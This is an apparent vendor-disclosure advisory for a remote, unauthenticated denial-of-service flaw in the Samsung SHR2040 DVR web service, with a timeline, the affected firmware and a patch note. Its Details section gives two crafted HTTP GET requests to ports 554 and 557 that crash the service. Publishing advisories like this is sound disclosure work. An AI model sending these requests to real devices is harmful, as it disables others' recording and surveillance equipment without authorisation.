|
Title
|
Samsung DVR SHR 2040 HTTPD Denial Of Service Vulnerabilities
|
|
ID
|
SYBSEC-ADV16
|
|
Severity
|
Medium - Remote Denial Of Service (DoS)
|
|
History
|
04.DIC.2007 Vulnerability discovered
07.DIC.2007 Vendor contacted
12.JUN.2008 Vendor re-contacted
05.SEP.2008 Release information
|
|
Scope
|
Application Denial of Service
|
|
Platforms
|
Any
|
|
Author
|
|
|
URL
|
http://www.sybsecurity.com/advisors/SYBSEC-ADV16-Samsung_DVR_SHR_2040_HTTPD_Remote_Denial_Of_Service
|
|
Release
|
Public
|
|
Overview
|
DVRs are basically mini-PCs that allow a user to record TV broadcasts, cable,
or DirectTV transmissions, depending on the model, in digital form on a hard drive located
inside the recorder.
|
|
Affected versions
|
The vulnerability has been reported in versions Samsung DVR
Firmware Version B3.03E-K1.53-V2.19_0705281908, Model = SHR2040
|
|
Description
|
The vulnerability is caused due to an unspecified error in the cgis files filter used for configure
propierties. This can be exploited by sending a specially crafted HTTP request (NO necessary authentication),
which will cause the HTTP service on the system to crash.
Requisites: Test default ports:
PORT STATE SERVICE
554/tcp open rtsp
557/tcp open openvms-sysipc
|
|
Workaround
|
Upgrade the firmware version you can download from:
http://www.samsung.com
The vendor has released a patch to address this issue.
Contact the vendor for details on obtaining and applying the appropriate updates.
|
|
Acknowledgments
|
|
|
References
|
|
|
Details
|
DoS exploit 1 TCP PORT 554:
GET / HTTP/1.1
Referer: 10.50.10.248
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Host: 10.50.10.248:554
Connection: Keep-Alive
Authorization: Basic JDEkOWhDOERtckwkOE5HOGkzcFFYQmFiQUtvLkFJbThVLjoxMjM0NQ==
Screenshot:
Screenshot:
DoS exploit 2 PORT 557:
GET /x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x//x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/ HTTP/1.1
Accept: */*
Referer: http://$1$9hC8DmrL$8NG8i3pQXBabAKo.AIm8U.:12345@10.50.10.248:557
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Host: 10.50.10.248:557
Connection: Keep-Alive
Authorization: Basic JDEkOWhDOERtckwkOE5HOGkzcFFYQmFiQUtvLkFJbThVLjoxMjM0NQ==
Screenshot:
|
|
Exploit tool
|
|
search
